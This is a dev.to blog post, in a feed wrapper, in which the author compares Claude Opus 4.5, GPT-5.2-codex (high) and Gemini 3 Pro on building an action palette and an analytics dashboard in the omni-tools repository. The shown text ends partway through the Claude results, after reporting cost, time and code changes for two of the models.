      <title>🔥 Claude Opus 4.5 vs GPT 5.2 High vs Gemini 3 Pro: Production Coding Test ✅</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Sun, 18 Jan 2026 12:41:12 +0000</pubDate>
      <link>https://dev.to/tensorlake/claude-opus-45-vs-gpt-52-high-vs-gemini-3-pro-production-coding-test-25of</link>
      <guid>https://dev.to/tensorlake/claude-opus-45-vs-gpt-52-high-vs-gemini-3-pro-production-coding-test-25of</guid>
      <description>&lt;p&gt;Okay, so right now the &lt;strong&gt;WebDev&lt;/strong&gt; leaderboard on LMArena is basically owned by the big three: Claude Opus 4.5 from &lt;strong&gt;Anthropic&lt;/strong&gt;, GPT-5.2-codex (high) from &lt;strong&gt;OpenAI&lt;/strong&gt;, and finally everybody's favorite, Gemini 3 Pro from &lt;strong&gt;Google&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltml19xef278wmy3f5y1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltml19xef278wmy3f5y1.png" alt="LLMDev models ranking"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, I grabbed these three and put them into the same existing project (over 8K stars and 50K+ LOC) and asked them to build a couple of real features like a normal dev would.&lt;/p&gt;

&lt;p&gt;Same repo. Same prompts. Same constraints.&lt;/p&gt;

&lt;p&gt;For each task, I took the best result out of three runs per model to keep things fair.&lt;/p&gt;

&lt;p&gt;Then I compared what they actually did: code quality, how much hand-holding they needed, and whether the feature even worked in the end.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; Don't take the results of this test as a hard rule. It's a small set of real-world coding tasks that shows how each model did for me in this exact setup, and gives you a rough sense of how the top three models compare on the same work.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you want a quick take, here’s how the three models performed in our tests:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Opus 4.5&lt;/strong&gt; was the most consistent overall. It shipped working results for both tasks, and its UI polish was the best of the three. The main downside is cost. If Anthropic finds a way to deliver this performance at a lower price, it will genuinely be over for most other models.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.2-codex (high)&lt;/strong&gt; was right up there with it, but noticeably slower because of the high reasoning setting. When it hit, the code quality and structure were great; it just needed more patience than the other two in this repo.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gemini 3 Pro&lt;/strong&gt; was the most efficient. Both tasks worked, but the output often felt like the minimum viable version, especially on the analytics dashboard.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 If you want the safest pick for real “ship a feature in a big repo” work, Opus 4.5 felt the most reliable in my runs. If you care about speed and cost and you’re okay polishing UI yourself, Gemini 3 Pro is a solid bet.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Test Workflow
&lt;/h2&gt;

&lt;p&gt;For the test, we will use the following CLI coding agents:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Opus 4.5:&lt;/strong&gt; Claude Code (Anthropic’s terminal-based agentic coding tool)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gemini 3 Pro:&lt;/strong&gt; Gemini CLI&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.2 High:&lt;/strong&gt; Codex CLI&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here’s the repo used for the entire test: &lt;a href="https://github.com/iib0011/omni-tools" rel="noopener noreferrer"&gt;iib0011/omni-tools&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will check the models on two different tasks:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Task 1:&lt;/strong&gt; Add a global Action Palette (Ctrl + K)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each model is asked to create a global action menu that opens with a keyboard shortcut. This feature expands on the current search by adding actions, global state, and keyboard navigation. This task checks how well the model understands current UX patterns and avoids repetition without breaking what's already in place.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Task 2:&lt;/strong&gt; Tool Usage Analytics + Insights Dashboard&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each model had to add real usage tracking across the app, persist it locally, and then build an analytics dashboard that shows things like the most used tools, recent activity, and basic filters.&lt;/p&gt;

&lt;p&gt;We’ll compare code quality, token usage, cost, and time to complete the build.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; I will share the source code changes for each task and each model as a &lt;code&gt;.patch&lt;/code&gt; file. That way, you can view them on your local system by cloning the repository and applying the patch with &lt;code&gt;git apply &amp;lt;patch_file_name&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
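&lt;p&gt;If you haven't used patch files before, here's a self-contained sketch of that workflow using a throwaway repo. The repo and file names below are placeholders for this demo; in practice you'd clone &lt;code&gt;iib0011/omni-tools&lt;/code&gt; and apply one of the shared &lt;code&gt;.patch&lt;/code&gt; files instead:&lt;/p&gt;

```shell
# Self-contained demo of the git patch workflow using a throwaway repo.
# In practice: clone iib0011/omni-tools and apply one of the shared .patch
# files. All names here are placeholders for the sketch.
set -e
tmp=$(mktemp -d)
cd "$tmp"
git init -q demo
cd demo
echo "hello" > app.txt
git add app.txt
git -c user.email=demo@example.com -c user.name=demo commit -qm "base commit"
echo "hello world" > app.txt
git diff > ../change.patch          # the kind of file shared in this article
git checkout -- app.txt             # back to the base commit state
git apply --check ../change.patch   # dry run: make sure it applies cleanly
git apply ../change.patch           # apply the changes
cat app.txt
```

&lt;p&gt;The &lt;code&gt;--check&lt;/code&gt; dry run is worth keeping in the habit loop: it tells you up front if the patch no longer applies to your checkout.&lt;/p&gt;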




&lt;h2&gt;
  
  
  Real-world Coding Tests
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Test 1: Add a global Action Palette (Ctrl + K)
&lt;/h3&gt;

&lt;p&gt;The setup is simple: all models start from the same base commit and follow the same prompt.&lt;/p&gt;

&lt;p&gt;And obviously, as mentioned, I evaluate each model on the best of its three runs.&lt;/p&gt;

&lt;p&gt;Let's start off the test with something interesting:&lt;/p&gt;

&lt;p&gt;Here's the prompt used:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;This&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;project&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;already&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;has&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;search&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;input&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;home&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;page&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;that&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;lets&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;users&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;find&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tools.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;I&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;want&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;add&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;an&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;improved,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;global&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span 
class="err"&gt;this&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;idea&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;that&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;works&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;as&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;an&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;**Action&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Palette**,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;similar&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;what&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;you&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;see&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;editors&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;like&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;VS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Code.&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;**What&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;build**&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Pressing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;**Ctrl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;K**&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(or&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Cmd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;K&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;macOS)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;open&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;centered&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;action&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;palette&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;overlay&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;anywhere&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;app.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;The&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;palette&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;support:&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Searching&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;navigating&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tools&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(reuse&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;existing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tool&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;metadata)&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Executing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;actions,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;such&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;as:&lt;/span&gt;&lt;span class="w"&gt;

    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Toggle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;dark&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;mode&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Switch&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;language&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Toggle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;user&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;filter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(General&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;/&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Developer)&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Navigate&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Home&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Bookmarks&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Clear&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;recently&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;used&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tools&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Fully&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;keyboard-driven&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;experience:&lt;/span&gt;&lt;span class="w"&gt;

  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;filter&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Arrow&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;keys&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;navigate&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Enter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;execute&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Escape&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;close&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;**Notes**&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;This&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;not&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;replace&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;existing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;home&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;page&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;search.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Think&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;it&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;as&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;more&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;powerful,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;global&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;that&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;combines&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;navigation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;actions.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;The&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;implementation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;follow&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;existing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;patterns,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;styling,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;state&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;management&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;used&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;codebase.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  GPT-5.2-Codex (high)
&lt;/h4&gt;

&lt;p&gt;GPT-5.2 handled this surprisingly well. The implementation was solid end to end, and it basically one-shotted the entire feature set, including i18n support, without needing multiple correction passes.&lt;/p&gt;

&lt;p&gt;That said, it did take a bit longer than some other models (~20 minutes), which is expected since reasoning was explicitly set to &lt;strong&gt;high&lt;/strong&gt;. You can clearly see the model spending more time thinking through architecture, naming, and edge cases rather than rushing to output code. The trade-off felt worth it here.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9r0rf1kkm4x2nlqpmnyg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9r0rf1kkm4x2nlqpmnyg.png" alt="gpt 5.2 high model timing to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Token usage was noticeably higher with reasoning set to high, but the quality of the output code reflected it.&lt;/p&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/QCXB5bv4-L4"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/6a8eea20c34d31429b254c82079a1972" rel="noopener noreferrer"&gt;GPT-5.2 High Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$0.90–1.00&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~20 minutes (API time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +540 lines, minimal removals&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total:&lt;/strong&gt; ~203k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~140k (+ cached context)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~64k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reasoning tokens:&lt;/strong&gt; ~47k&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; I ran the exact same prompt with the same model using the default (medium) reasoning level. The difference was honestly massive. With reasoning set to high, the quality of the code, structure, and pretty much everything jumps by miles. It’s not even a fair comparison.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhg35u0w8yip2r8myxqlf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhg35u0w8yip2r8myxqlf.png" alt="gpt 5.2 model token usage to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Claude Opus 4.5
&lt;/h4&gt;

&lt;p&gt;Claude went all in, laying out a ton of different strategies before touching code. At the start it ran into build issues, but it kept re-running the build until all the build and lint errors were fixed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feib2ks93r37revcoqg3e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feib2ks93r37revcoqg3e.png" alt="claude opus 4.5 build error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The entire run took about &lt;strong&gt;7 minutes 50 seconds&lt;/strong&gt;, the fastest of the three models on this test. The features all worked as asked, and obviously, the UI looked super nice and exactly how I expected.&lt;/p&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Gki_kO6o4Qw"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/5403f82ea5cf5991c14bc43ce3f47476" rel="noopener noreferrer"&gt;Claude Opus 4.5 Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To be honest, this exceeded my expectations; even the i18n texts are added and displayed in the UI just as expected. Absolute cinema!&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; $0.94&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; 7 min 50 sec (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +540 lines, -9 lines&lt;/li&gt;
&lt;/ul&gt;

